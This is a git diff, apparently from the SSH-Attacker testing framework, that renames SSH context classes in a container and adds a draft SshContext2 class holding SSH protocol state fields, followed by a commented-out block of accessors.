private final List inboundSshContexts = new ArrayList<>(); /** * An outbound SSH context is a context bound to an outgoing connection. I.e. it represents a * connection established by us to a remote server. */ - private final List outboundSshContexts = new ArrayList<>(); + private final List outboundSshContexts = new ArrayList<>(); /** * Get the only defined SSH context. @@ -51,15 +51,15 @@ public class ContextContainer { * @return the only known SSH context * @throws ConfigurationException if there is more than one SSH context in the container */ - public SshContext getSshContext() { - if (sshContexts.isEmpty()) { + public Context getContext() { + if (contexts.isEmpty()) { throw new ConfigurationException("No context defined."); } - if (sshContexts.size() > 1) { + if (contexts.size() > 1) { throw new ConfigurationException( "getSshContext requires an alias if multiple contexts are defined"); } - return sshContexts.entrySet().iterator().next().getValue(); + return contexts.entrySet().iterator().next().getValue(); } /** @@ -69,15 +69,15 @@ public SshContext getSshContext() { * @return the context with the given connection end alias * @throws ConfigurationException if there is no SSH context with the given alias */ - public SshContext getSshContext(String alias) { - SshContext ctx = sshContexts.get(alias); + public Context getSshContext(String alias) { + Context ctx = contexts.get(alias); if (ctx == null) { throw new ConfigurationException("No context defined with alias '" + alias + "'."); } return ctx; } - public void addSshContext(SshContext context) { + public void addContext(Context context) { AliasedConnection con = context.getConnection(); String alias = con.getAlias(); if (alias == null) { @@ -88,7 +88,7 @@ public void addSshContext(SshContext context) { throw new ConfigurationException("Connection end alias already in use: " + alias); } - sshContexts.put(alias, context); + contexts.put(alias, context); knownAliases.add(alias); if (con.getLocalConnectionEndType() == ConnectionEndType.SERVER) { @@ -100,15 +100,15 @@ public void addSshContext(SshContext context) { } } - public List getAllContexts() { - return new ArrayList<>(sshContexts.values()); + public List getAllContexts() { + return new ArrayList<>(contexts.values()); } - public List getInboundSshContexts() { + public List getInboundContexts() { return inboundSshContexts; } - public List getOutboundSshContexts() { + public List getOutboundContexts() { return outboundSshContexts; } @@ -125,11 +125,11 @@ public boolean containsAllAliases(Aliasable aliasable) { } public boolean isEmpty() { - return sshContexts.isEmpty(); + return contexts.isEmpty(); } public void clear() { - sshContexts.clear(); + contexts.clear(); knownAliases.clear(); inboundSshContexts.clear(); outboundSshContexts.clear(); @@ -137,10 +137,10 @@ public void clear() { public void removeSshContext(String alias) { if (containsAlias(alias)) { - SshContext removeMe = sshContexts.get(alias); + Context removeMe = contexts.get(alias); inboundSshContexts.remove(removeMe); outboundSshContexts.remove(removeMe); - sshContexts.remove(alias); + contexts.remove(alias); knownAliases.remove(alias); } else { LOGGER.debug("No context with alias " + alias + " found, nothing to remove"); @@ -153,21 +153,21 @@ public void removeSshContext(String alias) { *

The SshContext can only be replaced if the connection of both the new and the old * SshContext equal. * - * @param newSshContext the new SshContext, not null + * @param newContext the new SshContext, not null * @throws ConfigurationException if the connections of new and old SshContext differ */ - public void replaceSshContext(SshContext newSshContext) { - String alias = newSshContext.getConnection().getAlias(); + public void replaceContext(Context newContext) { + String alias = newContext.getConnection().getAlias(); if (!containsAlias(alias)) { throw new ConfigurationException("No SshContext to replace for alias " + alias); } - SshContext replaceMe = sshContexts.get(alias); - if (!replaceMe.getConnection().equals(newSshContext.getConnection())) { + Context replaceMe = contexts.get(alias); + if (!replaceMe.getConnection().equals(newContext.getConnection())) { throw new ContextHandlingException( "Cannot replace SshContext because the new SshContext" + " defines another connection."); } removeSshContext(alias); - addSshContext(newSshContext); + addContext(newContext); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java new file mode 100644 index 000000000..fb85168eb --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/SshContext2.java @@ -0,0 +1,963 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.state; + +import de.rub.nds.sshattacker.core.config.Config; +import de.rub.nds.sshattacker.core.connection.AliasedConnection; +import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; +import de.rub.nds.sshattacker.core.crypto.kex.AbstractEcdhKeyExchange; +import de.rub.nds.sshattacker.core.crypto.kex.DhKeyExchange; +import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; +import de.rub.nds.sshattacker.core.crypto.kex.RsaKeyExchange; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; +import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; +import de.rub.nds.sshattacker.core.protocol.connection.ChannelManager; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import de.rub.nds.tlsattacker.transport.TransportHandler; +import java.util.List; + +public class SshContext2 { + + /** Static configuration for SSH-Attacker */ + private Config config; + + private Chooser chooser; + + /** Connection used to communicate with the remote peer */ + private AliasedConnection connection; + + private TransportHandler transportHandler; + /** If set to true, an exception was received from the transport handler */ + private boolean receivedTransportHandlerException = false; + + /** The currently active packet layer type */ + private PacketLayerType packetLayerType; + /** A layer to serialize packets */ + private AbstractPacketLayer packetLayer; + /** + * If set to true, receive actions will read the incoming byte stream on a per line basis (each + * line is terminated by LF). + */ + private Boolean receiveAsciiModeEnabled; + /** A layer to serialize messages */ + // private MessageLayer messageLayer = new MessageLayer(this); + + /** + * Sequence number used to generate MAC when sending packages. The sequence number is unsigned, + * initialized to 0 and wraps around at 2^32. + */ + private Integer writeSequenceNumber; + /** + * Sequence number used to verify the MAC of received packages. The sequence number is unsigned, + * initialized to 0 and wraps around at 2^32. + */ + private Integer readSequenceNumber; + + /** + * If set to false, messages are handled as a server connection. handleAsClient is used to allow + * handling messages as a different connection end type than the connection end type of the + * fixed connection in the context. This is needed in the handling of mitm/proxy messages. + */ + private boolean handleAsClient; + + // region Version Exchange + /** Client protocol and software version string starting with the SSH version (SSH-2.0-...) */ + private String clientVersion; + /** Client comment sent alongside protocol and software version */ + private String clientComment; + /** End-of-message sequence of the clients' VersionExchangeMessage */ + private String clientEndOfMessageSequence; + /** Server protocol and software version string starting with the SSH version (SSH-2.0-...) */ + private String serverVersion; + /** Server comment sent alongside protocol and software version */ + private String serverComment; + /** End-of-message sequence of the servers' VersionExchangeMessage */ + private String serverEndOfMessageSequence; + + // endregion + + // region Key Exchange Initialization + /** Client cookie containing 16 random bytes */ + private byte[] clientCookie; + /** Server cookie containing 16 random bytes */ + private byte[] serverCookie; + /** List of key exchange algorithms supported by the remote peer */ + private List clientSupportedKeyExchangeAlgorithms; + /** List of key exchange algorithms supported by the server */ + private List serverSupportedKeyExchangeAlgorithms; + /** List of host key algorithms supported by the client */ + private List clientSupportedHostKeyAlgorithms; + /** List of host key algorithms supported by the server */ + private List serverSupportedHostKeyAlgorithms; + /** List of encryption algorithms (client to server) supported by the client */ + private List clientSupportedEncryptionAlgorithmsClientToServer; + /** List of encryption algorithms (server to client) supported by the client */ + private List clientSupportedEncryptionAlgorithmsServerToClient; + /** List of encryption algorithms (client to server) supported by the server */ + private List serverSupportedEncryptionAlgorithmsClientToServer; + /** List of encryption algorithms (server to client) supported by the server */ + private List serverSupportedEncryptionAlgorithmsServerToClient; + /** List of MAC algorithms (client to server) supported by the client */ + private List clientSupportedMacAlgorithmsClientToServer; + /** List of MAC algorithms (server to client) supported by the client */ + private List clientSupportedMacAlgorithmsServerToClient; + /** List of MAC algorithms (client to server) supported by the server */ + private List serverSupportedMacAlgorithmsClientToServer; + /** List of MAC algorithms (server to client) supported by the server */ + private List serverSupportedMacAlgorithmsServerToClient; + /** List of compression algorithms (client to server) supported by the client */ + private List clientSupportedCompressionMethodsClientToServer; + /** List of compression algorithms (server to client) supported by the client */ + private List clientSupportedCompressionMethodsServerToClient; + /** List of compression algorithms (client to server) supported by the server */ + private List serverSupportedCompressionMethodsClientToServer; + /** List of compression algorithms (server to client) supported by the server */ + private List serverSupportedCompressionMethodsServerToClient; + /** List of languages (client to server) supported by the client */ + private List clientSupportedLanguagesClientToServer; + /** List of languages (server to client) supported by the client */ + private List clientSupportedLanguagesServerToClient; + /** List of languages (client to server) supported by the server */ + private List serverSupportedLanguagesClientToServer; + /** List of languages (server to client) supported by the server */ + private List serverSupportedLanguagesServerToClient; + /** + * A boolean flag used to indicate that a guessed key exchange paket will be sent by the client + */ + private Boolean clientFirstKeyExchangePacketFollows; + /** + * A boolean flag used to indicate that a guessed key exchange paket will be sent by the server + */ + private Boolean serverFirstKeyExchangePacketFollows; + /** Value of the clients' reserved field which may be used for extensions in the future */ + private Integer clientReserved; + /** Value of the servers' reserved field which may be used for extensions in the future */ + private Integer serverReserved; + // endregion + + // region Negotiated Parameters + /** Negotiated key exchange algorithm */ + private KeyExchangeAlgorithm keyExchangeAlgorithm; + /** Negotiated host key algorithm */ + private PublicKeyAlgorithm hostKeyAlgorithm; + /** Negotiated encryption algorithm (client to server) */ + private EncryptionAlgorithm encryptionAlgorithmClientToServer; + /** Negotiated encryption algorithm (server to client) */ + private EncryptionAlgorithm encryptionAlgorithmServerToClient; + /** Negotiated MAC algorithm (client to server) */ + private MacAlgorithm macAlgorithmClientToServer; + /** Negotiated MAC algorithm (server to client) */ + private MacAlgorithm macAlgorithmServerToClient; + /** Negotiated compression algorithm (client to server) */ + private CompressionMethod compressionMethodClientToServer; + /** Negotiated compression algorithm (server to client) */ + private CompressionMethod compressionMethodServerToClient; + // endregion + + // region Key Exchange + /** Key exchange instance for static DH key exchange method(s) */ + private DhKeyExchange dhKeyExchangeInstance; + /** Key exchange instance for DH key exchange method(s) with group exchange */ + private DhKeyExchange dhGexKeyExchangeInstance; + /** Key exchange instance for ECDH key exchange method(s) (incl. X curve ECDH) */ + private AbstractEcdhKeyExchange ecdhKeyExchangeInstance; + /** Key exchange instance for RSA key exchange method(s) */ + private RsaKeyExchange rsaKeyExchangeInstance; + /** Key exchange instance for Hybrid key exchange method(s) */ + private HybridKeyExchange hybridKeyExchangeInstance; + /** + * If set to true, the most recent group request received was of type + * DhGexKeyExchangeOldRequestMessage + */ + private boolean oldGroupRequestReceived = false; + /** Minimal acceptable DH group size as reported in the SSH_MSG_KEX_DH_GEX_REQUEST message */ + private Integer minimalDhGroupSize; + /** Preferred DH group size as reported in the SSH_MSG_KEX_DH_GEX_REQUEST message */ + private Integer preferredDhGroupSize; + /** Maximal acceptable DH group size as reported in the SSH_MSG_KEX_DH_GEX_REQUEST message */ + private Integer maximalDhGroupSize; + /** Host key */ + private SshPublicKey hostKey; + /** Signature generated by the server over the exchange hash to authenticate the key exchange */ + private byte[] serverExchangeHashSignature; + /** Flag indicating whether the server exchange hash signature is valid */ + private Boolean serverExchangeHashSignatureValid; + // endregion + + // region Exchange Hash and Cryptographic Keys + /** Holder instance for the exchange hash input values */ + private ExchangeHashInputHolder exchangeHashInputHolder; + /** Exchange hash of the most recent key exchange */ + private byte[] exchangeHash; + /** + * Unique identifier for this session. This is equal to the first computed exchange hash and + * never changes + */ + private byte[] sessionID; + /** The shared secret established by the negotiated key exchange method */ + private byte[] sharedSecret; + /** The key set derived from the shared secret, the exchange hash, and the session ID */ + private KeySet keySet; + // endregion + + // region Connection Protocol + + private ChannelManager channelManager; + + // TODO: Implement channel requests in such a way that allows specification within the XML file + // endregion + + /** If set to true, a SSH_MSG_DISCONNECT has been received from the remote peer */ + private boolean disconnectMessageReceived = false; + /** If set to true, a version exchange message was sent by each side */ + private boolean versionExchangeCompleted = false; + + // DUMMY: + public SshContext2() {} +} + // DUMMY ENDE +/* + // region Constructors and Initalization + public SshContext() { + this(Config.createConfig()); + } + + public SshContext(Config config) { + RunningModeType mode = config.getDefaultRunningMode(); + if (mode == null) { + throw new ConfigurationException("Cannot create connection, running mode not set"); + } else { + switch (mode) { + case CLIENT: + init(config, config.getDefaultClientConnection()); + break; + case SERVER: + init(config, config.getDefaultServerConnection()); + break; + default: + throw new ConfigurationException( + "Cannot create connection for unknown running mode '" + mode + "'"); + } + } + } + + public SshContext(Config config, AliasedConnection connection) { + init(config, connection); + } + + public void init(Config config, AliasedConnection connection) { + this.config = config; + this.connection = connection; + exchangeHashInputHolder = new ExchangeHashInputHolder(); + + // TODO: Initial packet layer type from config + packetLayerType = PacketLayerType.BLOB; + packetLayer = PacketLayerFactory.getPacketLayer(packetLayerType, this); + receiveAsciiModeEnabled = true; + writeSequenceNumber = 0; + readSequenceNumber = 0; + handleAsClient = (connection.getLocalConnectionEndType() == ConnectionEndType.CLIENT); + channelManager = new ChannelManager(this); + } + + // endregion + + public Config getConfig() { + return config; + } + + public Chooser getChooser() { + if (chooser == null) { + chooser = ChooserFactory.getChooser(config.getChooserType(), this, config); + } + return chooser; + } + + public AliasedConnection getConnection() { + return connection; + } + + public void setConnection(AliasedConnection connection) { + this.connection = connection; + } + + public TransportHandler getTransportHandler() { + return transportHandler; + } + + public void setTransportHandler(TransportHandler transportHandler) { + this.transportHandler = transportHandler; + } + + public boolean hasReceivedTransportHandlerException() { + return receivedTransportHandlerException; + } + + public void setReceivedTransportHandlerException(boolean receivedTransportHandlerException) { + this.receivedTransportHandlerException = receivedTransportHandlerException; + } + + public void initTransportHandler() { + if (transportHandler == null) { + if (connection == null) { + throw new ConfigurationException("Connection end not set"); + } + transportHandler = TransportHandlerFactory.createTransportHandler(connection); + } + + try { + transportHandler.preInitialize(); + transportHandler.initialize(); + } catch (NullPointerException | NumberFormatException ex) { + throw new ConfigurationException("Invalid values in " + connection.toString(), ex); + } catch (IOException ex) { + throw new TransportHandlerConnectException( + "Unable to initialize the transport handler with: " + connection.toString(), + ex); + } + } + + public PacketLayerType getPacketLayerType() { + return packetLayerType; + } + + public void setPacketLayerType(PacketLayerType packetLayerType) { + this.packetLayerType = packetLayerType; + } + + public AbstractPacketLayer getPacketLayer() { + return packetLayer; + } + + public void setPacketLayer(AbstractPacketLayer packetLayer) { + this.packetLayer = packetLayer; + } + + public Boolean isReceiveAsciiModeEnabled() { + return receiveAsciiModeEnabled; + } + + public void setReceiveAsciiModeEnabled(boolean receiveAsciiModeEnabled) { + this.receiveAsciiModeEnabled = receiveAsciiModeEnabled; + } + + public MessageLayer getMessageLayer() { + return messageLayer; + } + + public void setMessageLayer(MessageLayer messageLayer) { + this.messageLayer = messageLayer; + } + + // region Getters and Setters for Sequence Numbers + public int getWriteSequenceNumber() { + return writeSequenceNumber; + } + + public void setWriteSequenceNumber(int writeSequenceNumber) { + this.writeSequenceNumber = writeSequenceNumber; + } + + public void incrementWriteSequenceNumber() { + incrementWriteSequenceNumber(1); + } + + public void incrementWriteSequenceNumber(int i) { + // Java does not support native unsigned integers :( + writeSequenceNumber = + (int) + ((Integer.toUnsignedLong(writeSequenceNumber) + Integer.toUnsignedLong(i)) + % DataFormatConstants.UNSIGNED_INT_MAX_VALUE); + } + + public int getReadSequenceNumber() { + return readSequenceNumber; + } + + public void setReadSequenceNumber(int readSequenceNumber) { + this.readSequenceNumber = readSequenceNumber; + } + + public void incrementReadSequenceNumber() { + incrementReadSequenceNumber(1); + } + + public void incrementReadSequenceNumber(int i) { + // Java does not support native unsigned integers :( + readSequenceNumber = + (int) + ((Integer.toUnsignedLong(readSequenceNumber) + Integer.toUnsignedLong(i)) + % DataFormatConstants.UNSIGNED_INT_MAX_VALUE); + } + + // endregion + + // region Getters for Version Exchange Fields + public Optional getClientVersion() { + return Optional.ofNullable(clientVersion); + } + + public Optional getClientComment() { + return Optional.ofNullable(clientComment); + } + + public Optional getClientEndOfMessageSequence() { + return Optional.ofNullable(clientEndOfMessageSequence); + } + + public Optional getServerVersion() { + return Optional.ofNullable(serverVersion); + } + + public Optional getServerComment() { + return Optional.ofNullable(serverComment); + } + + public Optional getServerEndOfMessageSequence() { + return Optional.ofNullable(serverEndOfMessageSequence); + } + + // endregion + // region Setters for Version Exchange Fields + public void setClientVersion(String clientVersion) { + this.clientVersion = clientVersion; + } + + public void setClientComment(String clientComment) { + this.clientComment = clientComment; + } + + public void setClientEndOfMessageSequence(String clientEndOfMessageSequence) { + this.clientEndOfMessageSequence = clientEndOfMessageSequence; + } + + public void setServerVersion(String serverVersion) { + this.serverVersion = serverVersion; + } + + public void setServerComment(String serverComment) { + this.serverComment = serverComment; + } + + public void setServerEndOfMessageSequence(String serverEndOfMessageSequence) { + this.serverEndOfMessageSequence = serverEndOfMessageSequence; + } + // endregion + + // region Getters for Key Exchange Initialization Fields + public Optional getClientCookie() { + return Optional.ofNullable(clientCookie); + } + + public Optional getServerCookie() { + return Optional.ofNullable(serverCookie); + } + + public Optional> getClientSupportedKeyExchangeAlgorithms() { + return Optional.ofNullable(clientSupportedKeyExchangeAlgorithms); + } + + public Optional> getServerSupportedKeyExchangeAlgorithms() { + return Optional.ofNullable(serverSupportedKeyExchangeAlgorithms); + } + + public Optional> getClientSupportedHostKeyAlgorithms() { + return Optional.ofNullable(clientSupportedHostKeyAlgorithms); + } + + public Optional> getServerSupportedHostKeyAlgorithms() { + return Optional.ofNullable(serverSupportedHostKeyAlgorithms); + } + + public Optional> + getClientSupportedEncryptionAlgorithmsClientToServer() { + return Optional.ofNullable(clientSupportedEncryptionAlgorithmsClientToServer); + } + + public Optional> + getClientSupportedEncryptionAlgorithmsServerToClient() { + return Optional.ofNullable(clientSupportedEncryptionAlgorithmsServerToClient); + } + + public Optional> + getServerSupportedEncryptionAlgorithmsServerToClient() { + return Optional.ofNullable(serverSupportedEncryptionAlgorithmsServerToClient); + } + + public Optional> + getServerSupportedEncryptionAlgorithmsClientToServer() { + return Optional.ofNullable(serverSupportedEncryptionAlgorithmsClientToServer); + } + + public Optional> getClientSupportedMacAlgorithmsClientToServer() { + return Optional.ofNullable(clientSupportedMacAlgorithmsClientToServer); + } + + public Optional> getClientSupportedMacAlgorithmsServerToClient() { + return Optional.ofNullable(clientSupportedMacAlgorithmsServerToClient); + } + + public Optional> getServerSupportedMacAlgorithmsServerToClient() { + return Optional.ofNullable(serverSupportedMacAlgorithmsServerToClient); + } + + public Optional> getServerSupportedMacAlgorithmsClientToServer() { + return Optional.ofNullable(serverSupportedMacAlgorithmsClientToServer); + } + + public Optional> getClientSupportedCompressionMethodsClientToServer() { + return Optional.ofNullable(clientSupportedCompressionMethodsClientToServer); + } + + public Optional> getClientSupportedCompressionMethodsServerToClient() { + return Optional.ofNullable(clientSupportedCompressionMethodsServerToClient); + } + + public Optional> getServerSupportedCompressionMethodsServerToClient() { + return Optional.ofNullable(serverSupportedCompressionMethodsServerToClient); + } + + public Optional> getServerSupportedCompressionMethodsClientToServer() { + return Optional.ofNullable(serverSupportedCompressionMethodsClientToServer); + } + + public Optional> getClientSupportedLanguagesClientToServer() { + return Optional.ofNullable(clientSupportedLanguagesClientToServer); + } + + public Optional> getClientSupportedLanguagesServerToClient() { + return Optional.ofNullable(clientSupportedLanguagesServerToClient); + } + + public Optional> getServerSupportedLanguagesServerToClient() { + return Optional.ofNullable(serverSupportedLanguagesServerToClient); + } + + public Optional> getServerSupportedLanguagesClientToServer() { + return Optional.ofNullable(serverSupportedLanguagesClientToServer); + } + + public Optional getClientFirstKeyExchangePacketFollows() { + return Optional.ofNullable(clientFirstKeyExchangePacketFollows); + } + + public Optional getServerFirstKeyExchangePacketFollows() { + return Optional.ofNullable(serverFirstKeyExchangePacketFollows); + } + + public Optional getClientReserved() { + return Optional.ofNullable(clientReserved); + } + + public Optional getServerReserved() { + return Optional.ofNullable(serverReserved); + } + + // endregion + // region Setters for Key Exchange Initialization Fields + public void setClientCookie(byte[] clientCookie) { + this.clientCookie = clientCookie; + } + + public void setServerCookie(byte[] serverCookie) { + this.serverCookie = serverCookie; + } + + public void setClientSupportedKeyExchangeAlgorithms( + List clientSupportedKeyExchangeAlgorithms) { + this.clientSupportedKeyExchangeAlgorithms = clientSupportedKeyExchangeAlgorithms; + } + + public void setServerSupportedKeyExchangeAlgorithms( + List serverSupportedKeyExchangeAlgorithms) { + this.serverSupportedKeyExchangeAlgorithms = serverSupportedKeyExchangeAlgorithms; + } + + public void setClientSupportedHostKeyAlgorithms( + List clientSupportedHostKeyAlgorithms) { + this.clientSupportedHostKeyAlgorithms = clientSupportedHostKeyAlgorithms; + } + + public void setServerSupportedHostKeyAlgorithms( + List serverSupportedHostKeyAlgorithms) { + this.serverSupportedHostKeyAlgorithms = serverSupportedHostKeyAlgorithms; + } + + public void setClientSupportedEncryptionAlgorithmsClientToServer( + List clientSupportedEncryptionAlgorithmsClientToServer) { + this.clientSupportedEncryptionAlgorithmsClientToServer = + clientSupportedEncryptionAlgorithmsClientToServer; + } + + public void setClientSupportedEncryptionAlgorithmsServerToClient( + List clientSupportedEncryptionAlgorithmsServerToClient) { + this.clientSupportedEncryptionAlgorithmsServerToClient = + clientSupportedEncryptionAlgorithmsServerToClient; + } + + public void setServerSupportedEncryptionAlgorithmsServerToClient( + List serverSupportedEncryptionAlgorithmsServerToClient) { + this.serverSupportedEncryptionAlgorithmsServerToClient = + serverSupportedEncryptionAlgorithmsServerToClient; + } + + public void setServerSupportedEncryptionAlgorithmsClientToServer( + List serverSupportedEncryptionAlgorithmsClientToServer) { + this.serverSupportedEncryptionAlgorithmsClientToServer = + serverSupportedEncryptionAlgorithmsClientToServer; + } + + public void setClientSupportedMacAlgorithmsClientToServer( + List clientSupportedMacAlgorithmsClientToServer) { + this.clientSupportedMacAlgorithmsClientToServer = + clientSupportedMacAlgorithmsClientToServer; + } + + public void setClientSupportedMacAlgorithmsServerToClient( + List clientSupportedMacAlgorithmsServerToClient) { + this.clientSupportedMacAlgorithmsServerToClient = + clientSupportedMacAlgorithmsServerToClient; + } + + public void setServerSupportedMacAlgorithmsServerToClient( + List serverSupportedMacAlgorithmsServerToClient) { + this.serverSupportedMacAlgorithmsServerToClient = + serverSupportedMacAlgorithmsServerToClient; + } + + public void setServerSupportedMacAlgorithmsClientToServer( + List serverSupportedMacAlgorithmsClientToServer) { + this.serverSupportedMacAlgorithmsClientToServer = + serverSupportedMacAlgorithmsClientToServer; + } + + public void setClientSupportedCompressionMethodsClientToServer( + List clientSupportedCompressionMethodsClientToServer) { + this.clientSupportedCompressionMethodsClientToServer = + clientSupportedCompressionMethodsClientToServer; + } + + public void setClientSupportedCompressionMethodsServerToClient( + List clientSupportedCompressionMethodsServerToClient) { + this.clientSupportedCompressionMethodsServerToClient = + clientSupportedCompressionMethodsServerToClient; + } + + public void setServerSupportedCompressionMethodsServerToClient( + List serverSupportedCompressionMethodsServerToClient) { + this.serverSupportedCompressionMethodsServerToClient = + serverSupportedCompressionMethodsServerToClient; + } + + public void setServerSupportedCompressionMethodsClientToServer( + List serverSupportedCompressionMethodsClientToServer) { + this.serverSupportedCompressionMethodsClientToServer = + serverSupportedCompressionMethodsClientToServer; + } + + public void setClientSupportedLanguagesClientToServer( + List clientSupportedLanguagesClientToServer) { + this.clientSupportedLanguagesClientToServer = clientSupportedLanguagesClientToServer; + } + + public void setClientSupportedLanguagesServerToClient( + List clientSupportedLanguagesServerToClient) { + this.clientSupportedLanguagesServerToClient = clientSupportedLanguagesServerToClient; + } + + public void setServerSupportedLanguagesServerToClient( + List serverSupportedLanguagesServerToClient) { + this.serverSupportedLanguagesServerToClient = serverSupportedLanguagesServerToClient; + } + + public void setServerSupportedLanguagesClientToServer( + List serverSupportedLanguagesClientToServer) { + this.serverSupportedLanguagesClientToServer = serverSupportedLanguagesClientToServer; + } + + public void setClientFirstKeyExchangePacketFollows( + boolean clientFirstKeyExchangePacketFollows) { + this.clientFirstKeyExchangePacketFollows = clientFirstKeyExchangePacketFollows; + } + + public void setServerFirstKeyExchangePacketFollows( + boolean serverFirstKeyExchangePacketFollows) { + this.serverFirstKeyExchangePacketFollows = serverFirstKeyExchangePacketFollows; + } + + public void setClientReserved(int clientReserved) { + this.clientReserved = clientReserved; + } + + public void setServerReserved(int serverReserved) { + this.serverReserved = serverReserved; + } + + // endregion + + // region Getters for Negotiated Parameters + public Optional getKeyExchangeAlgorithm() { + return Optional.ofNullable(keyExchangeAlgorithm); + } + + public Optional getHostKeyAlgorithm() { + return Optional.ofNullable(hostKeyAlgorithm); + } + + public Optional getEncryptionAlgorithmClientToServer() { + return Optional.ofNullable(encryptionAlgorithmClientToServer); + } + + public Optional getEncryptionAlgorithmServerToClient() { + return Optional.ofNullable(encryptionAlgorithmServerToClient); + } + + public Optional getMacAlgorithmClientToServer() { + return Optional.ofNullable(macAlgorithmClientToServer); + } + + public Optional getMacAlgorithmServerToClient() { + return Optional.ofNullable(macAlgorithmServerToClient); + } + + public Optional getCompressionMethodClientToServer() { + return Optional.ofNullable(compressionMethodClientToServer); + } + + public Optional getCompressionMethodServerToClient() { + return Optional.ofNullable(compressionMethodServerToClient); + } + + // endregion + // region Setters for Negotiated Parameters + public void setKeyExchangeAlgorithm(KeyExchangeAlgorithm keyExchangeAlgorithm) { + this.keyExchangeAlgorithm = keyExchangeAlgorithm; + } + + public void setHostKeyAlgorithm(PublicKeyAlgorithm hostKeyAlgorithm) { + this.hostKeyAlgorithm = hostKeyAlgorithm; + } + + public void setEncryptionAlgorithmClientToServer( + EncryptionAlgorithm encryptionAlgorithmClientToServer) { + this.encryptionAlgorithmClientToServer = encryptionAlgorithmClientToServer; + } + + public void setEncryptionAlgorithmServerToClient( + EncryptionAlgorithm encryptionAlgorithmServerToClient) { + this.encryptionAlgorithmServerToClient = encryptionAlgorithmServerToClient; + } + + public void setMacAlgorithmClientToServer(MacAlgorithm macAlgorithmClientToServer) { + this.macAlgorithmClientToServer = macAlgorithmClientToServer; + } + + public void setMacAlgorithmServerToClient(MacAlgorithm macAlgorithmServerToClient) { + this.macAlgorithmServerToClient = macAlgorithmServerToClient; + } + + public void setCompressionMethodClientToServer( + CompressionMethod compressionMethodClientToServer) { + this.compressionMethodClientToServer = compressionMethodClientToServer; + } + + public void setCompressionMethodServerToClient( + CompressionMethod compressionMethodServerToClient) { + this.compressionMethodServerToClient = compressionMethodServerToClient; + } + + // endregion + + // region Getters for Key Exchange Fields + public Optional getDhKeyExchangeInstance() { + return Optional.ofNullable(dhKeyExchangeInstance); + } + + public Optional getDhGexKeyExchangeInstance() { + return Optional.ofNullable(dhGexKeyExchangeInstance); + } + + public Optional getEcdhKeyExchangeInstance() { + return Optional.ofNullable(ecdhKeyExchangeInstance); + } + + public Optional getHybridKeyExchangeInstance() { + return Optional.ofNullable(hybridKeyExchangeInstance); + } + + public Optional getRsaKeyExchangeInstance() { + return Optional.ofNullable(rsaKeyExchangeInstance); + } + + public boolean isOldGroupRequestReceived() { + return oldGroupRequestReceived; + } + + public Optional getMinimalDhGroupSize() { + return Optional.ofNullable(minimalDhGroupSize); + } + + public Optional getPreferredDhGroupSize() { + return Optional.ofNullable(preferredDhGroupSize); + } + + public Optional getMaximalDhGroupSize() { + return Optional.ofNullable(maximalDhGroupSize); + } + + public Optional> getHostKey() { + return Optional.ofNullable(hostKey); + } + + public Optional getServerExchangeHashSignature() { + return Optional.ofNullable(serverExchangeHashSignature); + } + + public Optional isServerExchangeHashSignatureValid() { + return Optional.ofNullable(serverExchangeHashSignatureValid); + } + // endregion + // region Setters for Key Exchange Fields + public void setDhKeyExchangeInstance(DhKeyExchange dhKeyExchangeInstance) { + this.dhKeyExchangeInstance = dhKeyExchangeInstance; + } + + public void setDhGexKeyExchangeInstance(DhKeyExchange dhGexKeyExchangeInstance) { + this.dhGexKeyExchangeInstance = dhGexKeyExchangeInstance; + } + + public void setEcdhKeyExchangeInstance(AbstractEcdhKeyExchange ecdhKeyExchangeInstance) { + this.ecdhKeyExchangeInstance = ecdhKeyExchangeInstance; + } + + public void setHybridKeyExchangeInstance(HybridKeyExchange HybridKeyExchangeInstance) { + this.hybridKeyExchangeInstance = HybridKeyExchangeInstance; + } + + public void setRsaKeyExchangeInstance(RsaKeyExchange rsaKeyExchangeInstance) { + this.rsaKeyExchangeInstance = rsaKeyExchangeInstance; + } + + public void setOldGroupRequestReceived(boolean oldGroupRequestReceived) { + this.oldGroupRequestReceived = oldGroupRequestReceived; + } + + public void setMinimalDhGroupSize(Integer minimalDhGroupSize) { + this.minimalDhGroupSize = minimalDhGroupSize; + } + + public void setPreferredDhGroupSize(Integer preferredDhGroupSize) { + this.preferredDhGroupSize = preferredDhGroupSize; + } + + public void setMaximalDhGroupSize(Integer maximalDhGroupSize) { + this.maximalDhGroupSize = maximalDhGroupSize; + } + + public void setHostKey(SshPublicKey hostKey) { + this.hostKey = hostKey; + } + + public void setServerExchangeHashSignature(byte[] serverExchangeHashSignature) { + this.serverExchangeHashSignature = serverExchangeHashSignature; + } + + public void setServerExchangeHashSignatureValid(Boolean isValid) { + this.serverExchangeHashSignatureValid = isValid; + } + // endregion + + // region Getters for Exchange Hash and Cryptographic Keys + public ExchangeHashInputHolder getExchangeHashInputHolder() { + return exchangeHashInputHolder; + } + + public Optional getExchangeHash() { + return Optional.ofNullable(exchangeHash); + } + + public Optional getSessionID() { + return Optional.ofNullable(sessionID); + } + + public Optional getSharedSecret() { + return Optional.ofNullable(sharedSecret); + } + + public Optional getKeySet() { + return Optional.ofNullable(keySet); + } + // endregion + // region Setters for Exchange Hash and Cryptographic Keys + public void setExchangeHash(byte[] exchangeHash) { + this.exchangeHash = exchangeHash; + } + + public void setSessionID(byte[] sessionID) { + this.sessionID = sessionID; + } + + public void setSharedSecret(byte[] sharedSecret) { + this.sharedSecret = sharedSecret; + } + + public void setKeySet(KeySet transportKeySet) { + this.keySet = transportKeySet; + } + // endregion + + // region for Connection Protocol Fields + public HashMap getChannels() { + return channelManager.getChannels(); + } + + public ChannelManager getChannelManager() { + return channelManager; + } + + public void setChannelManager(ChannelManager channelManager) { + this.channelManager = channelManager; + } + // endregion + + public 